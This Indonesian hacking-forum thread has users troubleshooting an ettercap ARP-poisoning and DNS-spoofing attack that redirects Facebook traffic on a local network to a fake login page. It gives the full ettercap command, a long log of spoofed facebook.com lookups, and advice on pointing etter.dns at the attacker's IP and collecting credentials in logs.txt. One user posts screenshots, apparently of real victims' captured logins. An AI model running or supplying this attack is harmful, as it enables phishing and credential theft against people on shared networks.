+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Man In The Middle Attack (https://www.indonesianbacktrack.or.id/forum/forum-184.html)
+--- Thread: Share ettercap dns_spoof (fake login) #PART 2 (/thread-706.html)
RE: ettercap dns_spoof (fake login) #PART 2 - system112 - 01-22-2012
kak.. kok d tempat saya nano /usr/local/share/ettercap/etter.dns kosong..??
mohon pencerahannya kak..
RE: ettercap dns_spoof (fake login) #PART 2 - iKONspirasi - 01-22-2012
(01-22-2012, 01:25 PM)system112 Wrote: kak.. kok d tempat saya nano /usr/local/share/ettercap/etter.dns kosong..??
mohon pencerahannya kak..
coba locate etter.dns ada di folder mana lokasinya?
RE: ettercap dns_spoof (fake login) #PART 2 - system112 - 01-22-2012
thanks kak,
root@bt:~# locate etter.dns
/usr/local/share/videojak/etter.dns
/usr/share/ettercap/etter.dns
RE: ettercap dns_spoof (fake login) #PART 2 - iKONspirasi - 01-22-2012
tuh kliatan, klo ane pilih yg kedua yg nano /use/share/ettercap/etter.dns
RE: ettercap dns_spoof (fake login) #PART 2 - xsan-lahci - 03-03-2012
(01-22-2012, 03:03 PM)konspirasi Wrote: tuh kliatan, klo ane pilih yg kedua yg nano /use/share/ettercap/etter.dns
haha berhasil nih om
![[Image: bgbdk5.jpg]](http://oi40.tinypic.com/bgbdk5.jpg)
password tidak ane ganti tenang aja
eh dapet lagi nih
![[Image: 2uh5qwk.jpg]](http://oi44.tinypic.com/2uh5qwk.jpg)
RE: ettercap dns_spoof (fake login) #PART 2 - bayu freaky13 - 04-17-2012
punya saya koq kayak gini yaa??
Code:
Blue@CrimsoN:~# ettercap -Tq -i wlan0 -P dns_spoof -M arp // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> 74:2F:68:37:D5:C1 192.168.104.65 255.255.255.0
Privileges dropped to UID 0 GID 0...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
1 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-ih-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-ih-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-ih-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [00:A1:B0:81:5C:C8] DISCOVER
DHCP: [00:A1:B0:81:5C:C8] REQUEST 192.168.104.62
DHCP: [64:27:37:2C:F0:4D] REQUEST 192.168.104.66
DHCP: [192.168.104.1] ACK : 192.168.104.66 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
DHCP: [00:A1:B0:81:5C:C8] DISCOVER
DHCP: [00:A1:B0:81:5C:C8] REQUEST 192.168.104.62
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [192.168.104.1] ACK : 192.168.104.65 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [192.168.104.1] ACK : 0.0.0.0 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
DHCP: [64:27:37:2C:F0:4D] REQUEST 192.168.104.66
DHCP: [192.168.104.1] ACK : 192.168.104.66 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [64:27:37:2C:F0:4D] REQUEST 192.168.104.66
DHCP: [192.168.104.1] ACK : 192.168.104.66 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
DHCP: [192.168.104.1] ACK : 0.0.0.0 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
DHCP: [00:A1:B0:81:5C:C8] REQUEST 192.168.104.62
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [192.168.104.1] ACK : 0.0.0.0 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
DHCP: [00:21:00:1F:6D:D8] DISCOVER
dns_spoof: [facebook.com] spoofed to [198.168.104.65]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [developers.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
mohon pencerahanya..
RE: ettercap dns_spoof (fake login) #PART 2 - drewcode - 04-26-2012
wahh kren nih om...
nyoba ah.........
kalo ada problem tolong di bantu ya..........
RE: ettercap dns_spoof (fake login) #PART 2 - Backtrack Dragon - 04-27-2012
Permisi kawan, itu yang di etter.dns di isi IP kita atau orang lain?
terus file logs.txt di buat manual dulu atau ntar dia muncul otomatis?
1 lagi, aku coba buka file index.html, kok saat di klik "Login" malah download "post.php"
RE: ettercap dns_spoof (fake login) #PART 2 - kakus130908 - 04-27-2012
(04-27-2012, 10:43 AM)Backtrack Dragon Wrote: Permisi kawan, itu yang di etter.dns di isi IP kita atau orang lain?
terus file logs.txt di buat manual dulu atau ntar dia muncul otomatis?
1 lagi, aku coba buka file index.html, kok saat di klik "Login" malah download "post.php"
maaf om coba bantu,
untuk IP yang di etter.dns itu IP kita(attacker) jadi biyar yang buka facebook itu menuju IP kita(attacker),untuk logs.txt dibuat secara manual(wktu saya mencoba),tapi untuk yang klik login tapi download 'post.php' itu ane g mudeng hihi
#semogamembantu
RE: ettercap dns_spoof (fake login) #PART 2 - Backtrack Dragon - 04-28-2012
Aku coba buka file index.html yang di folder /var/www itu, pas klik login, malah dia download file post.php tadi. jadi sekarang juga masih bingung. tidak ada usrname&pass yang ketangkap